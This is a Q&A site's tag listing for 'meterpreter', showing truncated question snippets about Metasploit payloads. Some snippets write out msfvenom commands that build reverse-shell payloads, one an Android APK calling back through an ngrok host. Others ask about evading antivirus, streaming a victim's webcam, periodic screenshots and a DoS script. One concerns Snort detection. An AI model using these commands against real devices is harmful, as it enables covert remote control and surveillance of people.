Skip to main content

Questions tagged [meterpreter]

1vote
0answers
579views

The "Shell" command does not work in Meterpreter [closed]

I would like to share the solution I have used in this issue Scenario: meterpreter > ? Stdapi: System Commands ======================= Command Description ------- ...
Liang's user avatar
1vote
1answer
94views

How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
Onyz's user avatar
0votes
0answers
145views

Getting the error stdapi_webcam_start: Operation failed: 731 when trying to stream from my Logitech C920 webcam in Meterpreter

I'm trying to use the webcam_stream command in Meterpreter, and I receive the following error: meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: /home/kali/...
Lucas Fernandes's user avatar
0votes
1answer
148views

Using Metasploit on Kali to attack a Linux machine [closed]

Whats wrong with my exploit? I'm trying to attack a Linux machine using Kali. I cannot seem to get the meterpreter session started.
Dennys Perez's user avatar
0votes
1answer
254views

Snort rule doesn't match the content in Meterpreter session packet

I'm working on a university project and I'm trying to identify a reverse shell attack with Snort IDS. For the attack I used Meterpreter/reverse_tcp and analyzed the packets via Wireshark for traces to ...
Mattia cavaliere's user avatar
0votes
1answer
2kviews

APK reverse shell using ngrok is not creating a session

I am using ngrok for port forwarding (./ngrok tcp 4242) I created a payload using msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=16656 R> /var/www/html/package.apk then ...
Ambrish Katyayan's user avatar
2votes
0answers
310views

Metasploit Meterpreter how to restore/create new session? [closed]

I created an apk for Android with Metasploit. Started with host ip and port and opened the "receiver terminal" A lot of things worked well when executing the apk but after some time the ...
Darkxevon's user avatar
0votes
0answers
191views

How does meterpreter stay covert and undetected?

I've heard that meterpreter is really good at being stealthy and staying undetected. However, I can't seem to find articles detailing how it stays stealthy. I do know about encoders like "Shikata ...
ChocolateOverflow's user avatar
0votes
1answer
408views

session are not showing in meterpreter [duplicate]

I have a problem that when I try to open multi handler in msfconsole to exploit android, the sessions are not showing. But when I connect both PC and android to the same wifi, then the sessions are ...
Mr.Horror's user avatar
0votes
1answer
418views

Meterpreter: How to invoke commands in a loop for each new connection

I want to execute commands like screenshot on a regular interval (e.g. each 5min) for each incoming connection to Meterpreter using the reverse_tcp payload until the connection gets closed by the ...
muffel's user avatar
2votes
0answers
1kviews

Metasploit opens Meterpreter, but the shell is unresponsive [closed]

I created a payload using msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk signed the apk, sent it to my phone, opened up msfconsole and ran set payload android/...
jamessoupkitchen1234's user avatar
0votes
2answers
2kviews

Meterpreter session vs shell

What is the meaning of "meterpreter session"? My understanding is it is a session that we can send commands to the host for execution. And a meterpreter session is created when we don't get ...
ranjit silent's user avatar
0votes
0answers
31views

Will VPN help to restrict Meterpreter session? [duplicate]

I'm a victim of Meterpreter attack. I'm now using VPN in all the devices. My question is, will it help me to restrict meterpreter attack? If not, what is the way out to get rid of meterpreter attack?
Goutam Sarker's user avatar
0votes
2answers
1kviews

How to run a meterpreter script multiple times

I have this very simple script to run a rpcbomb script from auxiliary/dos/rpc/rpcbomb for a DOS attack. use auxiliary/dos/rpc/rpcbomb set RHOSTS Victim_IP_Address set RPORT 111 exploit -j -z I want ...
Nagarajan Sree's user avatar
0votes
2answers
3kviews

Making My Own Custom Payload [closed]

I have tried many different tools to avoid being detected by an AV while using meterpreter exploit. Here is a list of tools I have tried: Shellter, Posh C2, Hack the World, Veil, Fat Rat, and many ...
Mani's user avatar

153050per page
close